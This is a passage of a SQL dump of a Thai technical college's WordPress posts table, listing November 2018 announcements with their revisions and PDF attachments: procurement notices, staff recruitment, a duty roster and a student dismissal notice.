(4654, 3, '2018-11-22 09:54:55', '2018-11-22 02:54:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A2%E0%B8%B2%E0%B8%A1%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9E.%E0%B8%A8.2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง จ้างเหมาบริการยามรักษาการณ์ ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-9', '', '', '2018-11-26 11:58:43', '2018-11-26 04:58:43', '', 0, 'http://www.technicrayong.ac.th/?p=4654', 239, 'post', '', 0),
(4656, 3, '2018-11-22 09:54:55', '2018-11-22 02:54:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A2%E0%B8%B2%E0%B8%A1%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9E.%E0%B8%A8.%E0%B9%92%E0%B9%95%E0%B9%96%E0%B9%92.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง จ้างเหมาบริการยามรักษาการณ์ ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4654-revision-v1', '', '', '2018-11-22 09:54:55', '2018-11-22 02:54:55', '', 4654, 'http://www.technicrayong.ac.th/4654-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4659, 3, '2018-11-26 11:59:04', '2018-11-26 04:59:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A2%E0%B8%B2%E0%B8%A1%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9E.%E0%B8%A8.2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง จ้างเหมาบริการยามรักษาการณ์ ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4654-autosave-v1', '', '', '2018-11-26 11:59:04', '2018-11-26 04:59:04', '', 4654, 'http://www.technicrayong.ac.th/4654-autosave-v1/', 0, 'revision', '', 0),
(4660, 3, '2018-11-26 11:57:42', '2018-11-26 04:57:42', '', 'จ้างเหมาบริการยามรักษาการณ์ ประจำปีงบประมาณ พ.ศ.2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-11-26 11:57:42', '2018-11-26 04:57:42', '', 4654, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/จ้างเหมาบริการยามรักษาการณ์-ประจำปีงบประมาณ-พ.ศ.2562.pdf', 0, 'attachment', 'application/pdf', 0),
(4661, 3, '2018-11-26 11:58:01', '2018-11-26 04:58:01', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A2%E0%B8%B2%E0%B8%A1%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9E.%E0%B8%A8.2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง จ้างเหมาบริการยามรักษาการณ์ ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4654-revision-v1', '', '', '2018-11-26 11:58:01', '2018-11-26 04:58:01', '', 4654, 'http://www.technicrayong.ac.th/4654-revision-v1/', 0, 'revision', '', 0),
(4662, 3, '2018-11-28 09:44:45', '2018-11-28 02:44:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B8%98%E0%B8%B1%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนธันวาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-11-28 09:44:45', '2018-11-28 02:44:45', '', 0, 'http://www.technicrayong.ac.th/?p=4662', 238, 'post', '', 0),
(4663, 3, '2018-11-28 09:44:27', '2018-11-28 02:44:27', '', 'ตารางเวร ธันวาคม 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-11-28 09:44:27', '2018-11-28 02:44:27', '', 4662, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ตารางเวร-ธันวาคม-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(4664, 3, '2018-11-28 09:44:45', '2018-11-28 02:44:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B8%98%E0%B8%B1%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนธันวาคม 2561', '', 'inherit', 'closed', 'closed', '', '4662-revision-v1', '', '', '2018-11-28 09:44:45', '2018-11-28 02:44:45', '', 4662, 'http://www.technicrayong.ac.th/4662-revision-v1/', 0, 'revision', '', 0),
(4665, 3, '2018-11-28 10:39:00', '2018-11-28 03:39:00', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๕ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-4', '', '', '2018-11-28 10:39:00', '2018-11-28 03:39:00', '', 0, 'http://www.technicrayong.ac.th/?p=4665', 237, 'post', '', 0),
(4666, 3, '2018-11-28 10:36:21', '2018-11-28 03:36:21', '', 'สมัครคัดเลือก ครูอัตราจ้าง 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88', '', '', '2018-11-28 10:36:21', '2018-11-28 03:36:21', '', 4665, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/สมัครคัดเลือก-ครูอัตราจ้าง-5-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4667, 3, '2018-11-28 10:39:00', '2018-11-28 03:39:00', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๕ อัตรา', '', 'inherit', 'closed', 'closed', '', '4665-revision-v1', '', '', '2018-11-28 10:39:00', '2018-11-28 03:39:00', '', 4665, 'http://www.technicrayong.ac.th/4665-revision-v1/', 0, 'revision', '', 0),
(4668, 3, '2018-11-28 10:57:49', '2018-11-28 03:57:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%99%E0%B8%A3-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E-2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า ๑๕ วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8-5', '', '', '2018-11-28 10:57:49', '2018-11-28 03:57:49', '', 0, 'http://www.technicrayong.ac.th/?p=4668', 236, 'post', '', 0),
(4669, 3, '2018-11-28 10:57:29', '2018-11-28 03:57:29', '', 'นร พ้นสภาพ 2-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%a3-%e0%b8%9e%e0%b9%89%e0%b8%99%e0%b8%aa%e0%b8%a0%e0%b8%b2%e0%b8%9e-2-2561', '', '', '2018-11-28 10:57:29', '2018-11-28 03:57:29', '', 4668, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/นร-พ้นสภาพ-2-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(4670, 3, '2018-11-28 10:57:49', '2018-11-28 03:57:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%99%E0%B8%A3-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E-2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า ๑๕ วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '4668-revision-v1', '', '', '2018-11-28 10:57:49', '2018-11-28 03:57:49', '', 4668, 'http://www.technicrayong.ac.th/4668-revision-v1/', 0, 'revision', '', 0),
(4672, 3, '2018-11-29 08:24:50', '2018-11-29 01:24:50', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-2', '', '', '2018-11-29 08:24:50', '2018-11-29 01:24:50', '', 0, 'http://www.technicrayong.ac.th/?p=4672', 235, 'post', '', 0),
(4673, 3, '2018-11-29 08:24:35', '2018-11-29 01:24:35', '', 'ประกวดราคา ชุดฝึกหุ่นยนต์ 1 ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2-%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ab%e0%b8%b8%e0%b9%88%e0%b8%99%e0%b8%a2%e0%b8%99', '', '', '2018-11-29 08:24:35', '2018-11-29 01:24:35', '', 4672, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกวดราคา-ชุดฝึกหุ่นยนต์-1-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(4674, 3, '2018-11-29 08:24:50', '2018-11-29 01:24:50', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4672-revision-v1', '', '', '2018-11-29 08:24:50', '2018-11-29 01:24:50', '', 4672, 'http://www.technicrayong.ac.th/4672-revision-v1/', 0, 'revision', '', 0),
(4675, 3, '2018-11-29 08:28:34', '2018-11-29 01:28:34', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-3', '', '', '2018-11-29 08:28:34', '2018-11-29 01:28:34', '', 0, 'http://www.technicrayong.ac.th/?p=4675', 234, 'post', '', 0),
(4676, 3, '2018-11-29 08:27:29', '2018-11-29 01:27:29', '', 'ประกวดราคา ชุดฝึกอิเล็กทรอนิกส์ 1 ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2-%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81', '', '', '2018-11-29 08:27:29', '2018-11-29 01:27:29', '', 4675, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกวดราคา-ชุดฝึกอิเล็กทรอนิกส์-1-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(4677, 3, '2018-11-29 08:28:34', '2018-11-29 01:28:34', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4675-revision-v1', '', '', '2018-11-29 08:28:34', '2018-11-29 01:28:34', '', 4675, 'http://www.technicrayong.ac.th/4675-revision-v1/', 0, 'revision', '', 0),
(4678, 3, '2018-11-29 08:31:44', '2018-11-29 01:31:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-1-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่การเงิน จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-5', '', '', '2018-11-29 08:31:44', '2018-11-29 01:31:44', '', 0, 'http://www.technicrayong.ac.th/?p=4678', 233, 'post', '', 0),
(4680, 3, '2018-11-29 08:31:38', '2018-11-29 01:31:38', '', 'รับสมัคร เจ้าหน้าที่ธุรการ 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3-%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%98%e0%b8%b8-2', '', '', '2018-11-29 08:31:38', '2018-11-29 01:31:38', '', 4678, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/รับสมัคร-เจ้าหน้าที่ธุรการ-1-อัตรา-1.pdf', 0, 'attachment', 'application/pdf', 0),
(4681, 3, '2018-11-29 08:31:44', '2018-11-29 01:31:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-1-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่การเงิน จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '4678-revision-v1', '', '', '2018-11-29 08:31:44', '2018-11-29 01:31:44', '', 4678, 'http://www.technicrayong.ac.th/4678-revision-v1/', 0, 'revision', '', 0),
(4682, 3, '2018-11-29 15:25:09', '2018-11-29 08:25:09', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%84%E0%B8%A3%E0%B8%B1%E0%B9%89%E0%B8%87%E0%B8%97%E0%B8%B5%E0%B9%882.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างยนต์ (ครั้งที่ ๒) ประจำปีงบประมาณ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2-3', '', '', '2018-11-29 15:25:09', '2018-11-29 08:25:09', '', 0, 'http://www.technicrayong.ac.th/?p=4682', 232, 'post', '', 0),
(4683, 3, '2018-11-29 15:24:49', '2018-11-29 08:24:49', '', 'ประชาพิจารณ์ สาขาช่างยนต์ ครั้งที่2', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c-%e0%b8%aa%e0%b8%b2%e0%b8%82%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99', '', '', '2018-11-29 15:24:49', '2018-11-29 08:24:49', '', 4682, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประชาพิจารณ์-สาขาช่างยนต์-ครั้งที่2.pdf', 0, 'attachment', 'application/pdf', 0),
(4684, 3, '2018-11-29 15:25:09', '2018-11-29 08:25:09', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B8%84%E0%B8%A3%E0%B8%B1%E0%B9%89%E0%B8%87%E0%B8%97%E0%B8%B5%E0%B9%882.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างยนต์ (ครั้งที่ ๒) ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4682-revision-v1', '', '', '2018-11-29 15:25:09', '2018-11-29 08:25:09', '', 4682, 'http://www.technicrayong.ac.th/4682-revision-v1/', 0, 'revision', '', 